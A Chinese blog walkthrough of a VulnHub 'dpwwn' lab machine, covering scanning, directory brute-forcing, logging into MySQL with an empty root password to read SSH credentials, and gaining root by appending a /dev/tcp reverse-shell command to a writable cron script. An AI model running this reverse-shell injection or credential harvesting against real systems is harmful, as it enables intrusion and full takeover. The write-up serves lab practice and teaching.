vulnhub靶机dpwwn渗透测试

靶机打开后先扫描靶机IP:

netdicover

vulnhub靶机dpwwn渗透测试_第1张图片
经经验判断出靶机IP为:192.168.34.152,然后扫描一下靶机端口的开放情况:

nmap -sV -A -p 0-65535 192.168.34.152

vulnhub靶机dpwwn渗透测试_第2张图片
可以看见靶机开放了22,80和3306端口,我们先访问一下80端口:
vulnhub靶机dpwwn渗透测试_第3张图片
在这个页面中并没有什么发现,然后目录爆破一下看看:

dirb http://192.168.34.152

vulnhub靶机dpwwn渗透测试_第4张图片
发现出来一个info.php外就什么也没有了,打开看一下:
vulnhub靶机dpwwn渗透测试_第5张图片
发现了网站的根目录,但是这好像还是没什么用,这时再返回看一下端口,mysql数据库服务开着,然后尝试一下连接一下:

mysql -h 192.168.34.152 -u root -p

vulnhub靶机dpwwn渗透测试_第6张图片
经过不断尝试发现是空密码,然后直接就进去了,先看一下有没有什么有用的东西:

show databases;

vulnhub靶机dpwwn渗透测试_第7张图片
看见有个ssh数据库,这就得进去看看了:

use ssh
show tables;
select * from users;

vulnhub靶机dpwwn渗透测试_第8张图片
vulnhub靶机dpwwn渗透测试_第9张图片
得到一个账户,这应该就是靶机ssh连接的一个账号,试着连接一下:
vulnhub靶机dpwwn渗透测试_第10张图片
不知道为什么我的ssh直连连接不上,我用xshell连接试了一下,xshell能连接,ssh却直连不了,这个问题很难受:
vulnhub靶机dpwwn渗透测试_第11张图片
进来以后先看一下权限:

id

在这里插入图片描述
然后我们就得开始提权了,经过一系列尝试发现
这个用户的权限太低,上传,下载的权限没有,许多命令,工具也用不了,这就给我们进行提权造成了很大困难,然后先查看一下有什么东西:

ls

在这里插入图片描述
发现有个shell脚本,先看一下这个文件的权限:

ls -l

vulnhub靶机dpwwn渗透测试_第12张图片
这个文件是个可执行的文件,然后我们试着把反向shell的代码重定向到logrot.sh这个文件中,接着再在kali上监听一个端口,等上一会儿,就会得到一个shell,经过查看,这个shell就是root用户的shell:

nc -lvvp 5555

在这里插入图片描述

echo "0<&126-;exec 126<>/dev/tcp/192.168.34.115/5555;sh <&126 >&126 2>&126 " >> logrot.sh 

在这里插入图片描述
vulnhub靶机dpwwn渗透测试_第13张图片
经过一番劫难,终取得root权限,实属不易,这也是经过多方参考大佬的笔记以及各种提权方式的讲解才做出来的,路还很长,继续加油!

你可能感兴趣的:(vulnhub)